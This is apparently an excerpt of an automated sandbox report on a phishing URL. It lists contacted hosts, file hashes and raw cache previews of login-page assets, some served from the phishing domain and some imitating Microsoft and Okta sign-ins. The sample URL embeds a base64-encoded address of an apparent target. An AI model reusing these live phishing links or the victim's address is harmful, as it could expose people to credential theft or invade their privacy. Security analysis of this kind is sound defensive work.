                                                                                                                    		app.mockflow.comUnited States
                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                    172.67.70.233
                                                                                                                    		get.geojs.ioUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    104.16.4.189
                                                                                                                    		unknownUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    192.168.2.16

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                    Analysis ID:1649267
                                                                                                                    Start date and time:2025-03-26 16:10:49 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                    Sample URL:https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:9
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • EGA enabled
                                                                                                                    Analysis Mode:stream
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.phis.evad.win@31/59@91/372
                                                                                                                    • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.251.32.110, 142.251.40.131, 142.251.179.84, 142.251.40.206, 4.245.163.56
                                                                                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&amp;sa=D&amp;sntz=1&amp;usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==

                                                                                                                    Created / dropped Files

                                                                                                                    Chrome Cache Entry: 103

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 31140
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):10808
                                                                                                                    Entropy (8bit):7.975248180400043
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:E0A459F59D761865E79557181761786D
                                                                                                                    SHA1:B36FAEC5EDFF90478B5AB0473046FF4E3065F3AC
                                                                                                                    SHA-256:8EBE2D2D5B508F67F1487BB8531709771A615BF0F59C2E1C7AE0BADEC74AB91F
                                                                                                                    SHA-512:7DB85A156DE57D8DC8639A1E5126663BB17576372572123A8B7802E06B87FDE100D22BBC0EDDACED8900DD8C35841CDCBFCFF181D48D5DE92BA4DBBB039DE186
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_vdk0yeud2apnqxs0idvaca2.js
                                                                                                                    Preview:...........}.r.8..h8...i../..t.\.,.%..;jz.....S...ri<.1.../.{.K6/..R....[...H$.Df"3....L.E...8~V..(9~..G.....H$i.T..T|.Q....D...E.gYf=.1=.JL?t\.Z..}y#..l.p|..S.L...cx.f.?U./.M.~.....0..E;....a..Q.....|.fh....Q..F..........f....M....(.."^..z.y./L.;t?:..(L.}1.V......mc.F...I.I....O$*..'..$.\............Q.|3.0M$....$..y.E..?.s..|..#..............oa.U6N.?..[yr.J.@........<...E.IDq%q.E..^.$.$.......,...ie..'..h....*....PY......D./.....+1...i.a......:.n(.....\.>.I`<<||.&.........TBz.`..(.s......C.V"...k...V.S...o.'~...].L.4.@@...o^.....Ml:..H.............F......B`.u..K.*.L..f..I......J.{6{(J.E....\D..s.Q...p..C.$....hM.?...K..06.(Sy.q-.E.Qa.....0..G.....\..$.....v...>.(.... .%.c.....'.D....9.....`a..U.Q..it...Q..+..].{....P$@... .b..$.Yh.r... 1Q...IB..."....=9.O..'*A.....#.".B...F>4q7...A...@...->...j.@.dz0Q.V......t.......5.d....*$).^.f#..).."S..>..@Q........<.d..Q.......Y..%...AV@0..{Z.I.JY .N..........6~..T..c......../..TPg...@.CZe`<..7..JXO+.%.P...:

                                                                                                                    Chrome Cache Entry: 104

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):25216
                                                                                                                    Entropy (8bit):7.947339442168474
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                    SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                    SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                    SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210
                                                                                                                    Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#

                                                                                                                    Chrome Cache Entry: 105

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):16
                                                                                                                    Entropy (8bit):3.875
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:D2D53FA462C0BAECF299727EBB244751
                                                                                                                    SHA1:6EC0B3DD1D25F41CE2DBCCFFD223F7BA7C931357
                                                                                                                    SHA-256:E1C06F97FD2A1180AFDCA3B43AF1C7978E513B63050B9BB9B76D8F8BCA16CD5E
                                                                                                                    SHA-512:DC6794B2372610A1F702E1792625037FD4A0A19FE909695091C2A5FDB6DCDAC44997F04F2C9130C1487FB526743A9C1218B956C4AD253EBD3AC63C9D74ABE32F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCc-Swu33DZ-vEgUNOZzRFiEuRo842QqkjA==?alt=proto
                                                                                                                    Preview:CgkKBw05nNEWGgA=

                                                                                                                    Chrome Cache Entry: 106

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):29
                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                    Chrome Cache Entry: 107

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (51734)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):222931
                                                                                                                    Entropy (8bit):5.0213311632628725
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh

                                                                                                                    Chrome Cache Entry: 108

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):93276
                                                                                                                    Entropy (8bit):7.997636438159837
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-vf2.woff2
                                                                                                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

                                                                                                                    Chrome Cache Entry: 109

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 296 x 302, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24960
                                                                                                                    Entropy (8bit):7.943786041523229
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:FD59A454C80D16A1CB998096478F7068
                                                                                                                    SHA1:EB74904B48F598EC609BE7B6E0089AE5F06DB825
                                                                                                                    SHA-256:83987E0F63D43F20FF756121F3D91B50787C1E4E57D3BCA110C06D0D6423C8CC
                                                                                                                    SHA-512:412E1D98F6B2BB2AAADE98C92F5577C00118A40F445ECDA16C3B1BF5C10E2B065CEB6CDDE0FC1A8F8D64F015BAC310E7DE17BDB242FE1CBD593D36FB7582FF27
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR...(.........=^....aGIDATx^.......K>..{.T.}..3/.I...& . 2..@...F. ..*.Q....eT.y.q`.dP.2..`.P1........[..V.+..T..9.^k....&.{...Z..H".$.H".$..?6].|y!W.w...%.D.I.@t..i.y.x..c..;...<.%......C.......-}...N..@n.....E...*7e...../.....:q......~'....\A!p.0.|.... ....D.{@......3.......>.H...#..d.L.......zbi..2..q...S..TW..g@U._.7.W....).b......._..R.......W.vx.X..j\.QZ....{...T..Ha......L..O.'.. .(..%%.b\.`RJ...@.e...j.....l..P\.R..w.%q...t.]5s.z./....1Fog..T....>K..y..."]...:..Z........qC5y....s.SH.j..<m.9.U.V..i..L..# ..@...x..{zd.P......l\m.......P...U:...uI......=..%.r..M...>\.&\=..N7.t.f.k.1).*....O.K..d..r..V4z@%...R.X.......XY.]g....(...}..]..%;x...;...X...@Y..L.<cAE.'K..#p.A%c...N..2.).t...=..u.....T.. ..@.j..E...*..$.$.....5.).T1.)~@.C*~8%...R....U.s..n....&..e,.u..- ...:...............>....N1.x..N....T.g7...'..y....|..P..w..R.\?7....wR.%.u[.....Z"@...r........W.).*mX....!....@E....{...m(s..z......J......3.

                                                                                                                    Chrome Cache Entry: 110

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):5162
                                                                                                                    Entropy (8bit):5.349865760247148
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                    SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                                                    SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                    SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.Rc_yzHk8ifQ.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuv2QHsljKVzbRNNpe_a-fLlyIBPw"
                                                                                                                    Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                    Chrome Cache Entry: 111

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 270
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):190
                                                                                                                    Entropy (8bit):6.864386660871438
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:AE9FBF7DA7492B12D4A3E8E016661379
                                                                                                                    SHA1:4348F5D88E575FFA9CA6DF4326DB86CBFE437252
                                                                                                                    SHA-256:3E1AA58732ED06C27F36460506AE841719F7D873AB6215F6A29ACE2144EFED32
                                                                                                                    SHA-512:D1D28CC62F8E7E91C274719013D5AE695D1E3E45F7BEF1D4CFDECEC936C6C961427B2E40C317E381158D9F063DDE96310641352A481DEBC8C9CB06E4316A6647
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:..........u....0.._e.W.u#b0...7..-A .a<...7.&...O..tl}.C0.....1F.K>.P.(..X..r......m..m....d.J..&O.m..,.-6.g{..[......`A4zj...k.OEUHUH.K..E.ib..e...#/.."...$...1.3..'.....7.7"......

                                                                                                                    Chrome Cache Entry: 112

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):9648
                                                                                                                    Entropy (8bit):7.9099172475143416
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                    SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                    SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                    SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238
                                                                                                                    Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....

                                                                                                                    Chrome Cache Entry: 113

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):644
                                                                                                                    Entropy (8bit):4.6279651077789685
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                    SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                    SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                    SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130
                                                                                                                    Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...

                                                                                                                    Chrome Cache Entry: 115

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):346
                                                                                                                    Entropy (8bit):5.211993416225516
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:363E7086B8A69C405DD29EC4CB4E3356
                                                                                                                    SHA1:939BD4C8D1D71476ABD609285A345334175E6866
                                                                                                                    SHA-256:DBB5E11B60A87490F11E0AC5EAA7D3FA61C26E80729EB3EC91CCB2D755A5B3D2
                                                                                                                    SHA-512:7C68EE316EDDBEDDE9459D92A2EF84D4A07419A743FB7969C7953F612907CFBAC889135EEB4FCE1488DC09308C519C132DBA8D111B53BAFD5EAF74E35049C0B5
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j
                                                                                                                    Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://csnrda.net/un-plugins/">.</HEAD>.<BODY onLoad="location.replace('https://csnrda.net/un-plugins/'+document.location.hash)">.Redirecting you to https://csnrda.net/un-plugins/</BODY></HTML>..

                                                                                                                    Chrome Cache Entry: 117

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 368197
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):98980
                                                                                                                    Entropy (8bit):7.996132466649899
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:F680E06DD2216B84E7A1D1DAF265C4B3
                                                                                                                    SHA1:683113FFA33A2EB66392E515166609286106BF90
                                                                                                                    SHA-256:E0BF34E025B7917DC4327FA13D12385CB2CDDF4C2BD3E97B6609838FF725461C
                                                                                                                    SHA-512:BC4300CB39E915D6A6A87F8D4DFFF8B9084AEEC4E5CAB5C7F1313408799A394492B55B2AA4A160D032D79745151A25E8568DF23837655184A16E58F506AF9260
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedError_Core_PWRgAKrzdYnFW2jQnv9chg2.js
                                                                                                                    Preview:...........{w.6.8..~..3.1.......+..nMl.c.I.=>...eR....I..U...).......<,.(...B.P(|.q....X....*.a.zX....?...*W..G.?.v.......>.qe.OY.~GN.J.T...n....IX\y....L+.(|.$..2..?.....'.i..K...E^....J.J.A..J.'~...p....I%...e.'.)...U.....>T.|7..p.T".2..*......8...,...(y..U..)J...^cL...g....Q....Cl.l...<a0}.).H.....PI..[8..........).z0>+.......f.gl.tZ..<...bl{.... ..U&.. .eu0p.$b.....c.u.V.f...Qaq..fl.cK...1.I2.T...Q.#.T.uso....:OzH.Yl}.0....O..p>.:14.}..y..6._.......WV.j>..T..'..d]W*.{9._I......;......;;pz|......Ve.B~W.j..0.>;.|#4.;.......wFl....;..rjS.L...xgG.m.6.3.#.55..$L.f.......P2c@L5.........w..nm6.....Zt.?...6 ..D.7.....Ye......J.=..+[......'U...D......E...R,8...\.o.;=b.<....5 S....e.1.^.V`L.-....b.:...f.&&2.....C`jo...G....#?..jbw..yS.b.....:...M..-...1M/=y.....2..n....eVva.:...$z#...W..B......;.L..Q..p.8.d..86L.0..q..c;.....0*.....Y....tj.l6}..FZ6...t........c.k1#....,.P.R..O.HIC.9F.../t.....xv..\...K.Sbi....\:O..!...tSz..%C..G..a..v0

                                                                                                                    Chrome Cache Entry: 120

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):130659
                                                                                                                    Entropy (8bit):5.44240055906152
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:46D5B81479D9B2B89EFFD67A8E632655
                                                                                                                    SHA1:24259D950AB04DAF2E856222F515DD8D81076374
                                                                                                                    SHA-256:C496C2FAD191B87853D8614D109DD8E7DE133804F18ED4F9D0F819416CDD27C4
                                                                                                                    SHA-512:6CAEE461F1637C240976652054C6D24D3D2C39AF5DAFCEE166D563B1A9E114813A8BE152CFDA42DBDE0A6BAC8A397254B53231FC4B357580B28FE78854268E34
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
